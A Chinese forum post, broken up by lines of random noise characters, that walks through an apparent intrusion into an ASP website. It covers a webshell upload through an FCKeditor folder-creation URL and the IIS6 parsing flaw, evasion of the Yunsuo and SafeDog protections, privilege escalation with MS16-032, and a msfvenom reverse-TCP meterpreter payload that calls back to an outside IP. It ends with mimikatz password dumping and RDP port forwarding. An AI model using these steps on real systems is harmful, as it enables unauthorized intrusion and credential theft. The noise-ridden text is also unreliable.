|
+ f8 \, S+ v# f! A6 n4 ~! s! ~ ! F) E! j# F( P& A" _8 M
) B5 I8 s. e: q
% C8 O9 ^* N/ j) o4 [5 \
|
3 G" m9 L0 F" E8 s/ W: \
T$ @3 A- [9 \
* l" m$ H/ O' m) ]
一、 利用getwebshell篇
5 s& }! U2 v. ^3 i
, n" t6 O* j, r/ o2 m8 Z* a
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
9 j9 k, a% O+ u! p4 k% j, o
0 d; w& F2 g: x o9 Y
5 G2 R# Y. X: @/ O9 E) U( p: R下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
0 f4 }$ ~# O! i+ k
- _3 {4 H+ T3 B7 P- _7 {3 T
下面我们构造一个asp目录,如: # p: F; Z. f' U6 _
/ _" S0 N+ i W$ o n# r8 U : r7 I+ }7 K C% V" E% ~* U
http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 " T' W! `# R$ `+ _0 H I
7 ]0 g. }# |" _& f! d5 K) \
6 q2 h, [. N) ^* y% T6 i! f A 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
- } V& g% I( L3 O" H* {" t. `
5 I3 c8 w( o% b/ u2 h; y: ^& Q5 U一、 绕过安全狗云锁提权并且加账号
( O# t; X% U! k2 L8 B M- H+ I
9 u! R$ H2 t% L8 {' g; e) E& I没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
9 z( m% f+ _3 _! ]& K3 F! \% r1 L
5 L4 K3 v) K. K
如图:
7 [3 [( o* y0 W# z1 S! k
% S- ^7 D( r, w+ x- X然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
4 T7 U5 Q, W* R2 `6 _2 m9 K
- _0 C2 X) S3 S2 U8 V0 a
一、 利用metasploit
' c" @* e0 D" V7 S) c
: w% o% D3 {+ W) D首先用pentestbox生成一个64位的payload如下命令
5 D0 X9 K% ^' q
1 |- v+ L0 w' s* Y
msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
/ v# m+ u, a- Z7 a! b5 x
5 z) n1 o# `# E- v) Z为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
/ R+ i; v$ Y$ }% Z4 w5 Q
, v0 _$ C8 ~- q" L. m下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图:
0 }: k5 R% {; n$ g. G8 Y( S `
0 ^1 g) l2 s9 d$ P2 L
下面我们来做一个监听如下命令:
& U ]* n; E3 f- D" @
, @% z/ F: {7 Z
portfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图:
( n4 t5 i K# ~. L+ C
 o* s8 d" w" W. K/ }$ `
E2 l6 b2 V- R! W0 q+ Z8 [8 y1 Q. Q | 1 S# _6 N0 o$ O: d
1 C# ^! i4 X7 B3 K1 z& w- J, k
?, @8 L/ w! X7 U2 J7 w
& {' p; g( {# A$ J8 |
' _* |4 _; P7 @# N* u6 ~+ `0 l
% C5 T3 y& P; Y' V- D
* u" P4 J* ?, ?
+ h1 d: { U5 O8 x$ ] # i3 I4 A$ J0 | k4 R( g
8 J6 W1 f: K7 W; g8 k, y. S. n: {* u
+ B; b2 F/ q: g( S4 O0 r - N( m) w. `6 e
1 U8 l: S6 u+ z }- o
! U' z* z9 }# t
| 
发表于 2018-10-20 20:31:43
收藏
支持
反对
匿名
发表于 2021-11-20 23:30:06